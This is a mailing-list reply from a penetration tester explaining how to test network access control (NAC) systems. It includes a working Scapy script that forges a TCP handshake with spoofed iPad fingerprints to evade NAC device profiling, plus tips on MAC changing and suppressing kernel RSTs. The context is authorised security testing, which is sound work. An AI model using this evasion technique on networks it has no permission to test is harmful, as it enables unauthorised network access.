Re: spoofing another machine's fingerprints

[Joshua Wright <jwright () hasborg com>]

> > As I asked about recently, I'll soon be testing a NAC type device and so I was wondering, is there a tool which 
> > will let me watch a device then clone its network fingerprint? By fingerprint I mean things like network settings 
> > such as TTLs but also open ports (probably couldn't spoof the service but at least open the port).
> >
> > I know there is a tool that is designed to fool attackers by having a list of different OS's and you chose which 
> > you want to pretend to be but rather than pick from a list I want to be able to point it at another machine and say 
> > "clone that".
>
> What do you do for IP? Do you work out what is on the network through passive observation and then pick something 
> that looks appropriate?
>
> Any other suggestions on testing/avoiding NAC? I've not tested with one in action before and don't have anything to 
> practice against. This particular test is to see if it is doing its job properly so specifics on testing a NAC would 
> be good.

When I'm testing a NAC system I connect with a standard Windows or OS X client first, and explore what's accessible, 
trying to identify the NAC vendor.  From there I'll do some passive analysis, and try to determine if there are any 
exception policies applied (such as a rule for iPad's not having to authenticate, etc.)

NAC vendors commonly perform OS fingerprinting to identify devices, and products like Cisco ISE use the fingerprints to 
apply rules to devices.  They can't continually fingerprint the devices though, so they perform an initial analysis, 
and then subsequent analysis per the NAC configuration (IIRC, Cisco ISE's re-check interval has a minimum delay of 15 
minutes, with a default of "check once").  I'll typically change my MAC to get another IP, and use Scapy to complete a 
3-way handshake to any accessible host, just to trick the OS fingerprinting rule (Cisco ISE checks TCP option 
parameters including order of options, which is hard to spoof on Linux, and impossible on Windows, but Scapy does it 
just fine).  Here is a sample script I have laying around:

#!/usr/bin/python
from scapy.all import *

DSTIP="10.10.10.110" # Specify your target where NAC will observe it
SPORT=RandNum(1024,65535)

ip=IP(dst=DSTIP, flags="DF", ttl=64)
tcpopt = [ ("MSS",1460), ("NOP",None), ("WScale",2), ("NOP",None),
    ("NOP",None), ("Timestamp",(123,0)), ("SAckOK",""), ("EOL",None) ]
SYN=TCP(sport=SPORT, dport=80, flags="S", seq=10, window=0xffff, options=tcpopt)
SYNACK=sr1(ip/SYN)       # Send the packet and record the response as SYNACK

my_ack = SYNACK.seq + 1  # Use the SYN/ACK response to get initial seq. number
ACK=TCP(sport=SPORT, dport=80, flags="A", seq=11, ack=my_ack, window=0xffff)
send(ip/ACK)

data = "GET / HTTP/1.1\r\nHost: " + DSTIP + "\r\nMozilla/5.0 (iPad; CPU OS 5_0 like Mac OS X) AppleWebKit/534.46 
(KHTML, like Gecko) Version/5.1 [...]\r\n\r\n"
PUSH=TCP(sport=SPORT,dport=80, flags="PA", seq=11, ack=my_ack, window=0xffff)
send(ip/PUSH/data)

RST=TCP(sport=SPORT,dport=80, flags="R", seq=11, ack=0, window=0xffff)
send(ip/RST)


Before you use this script, make sure you apply an iptables rule to stop the Linux native stack from sending a TCP RST 
to the spoofed TCP SYN.

After I get some of this traffic through, I do some more testing to see what my connectivity looks like with netcat or 
manual Scapy connections.

HTH,

-Josh
_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail pauldotcom com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com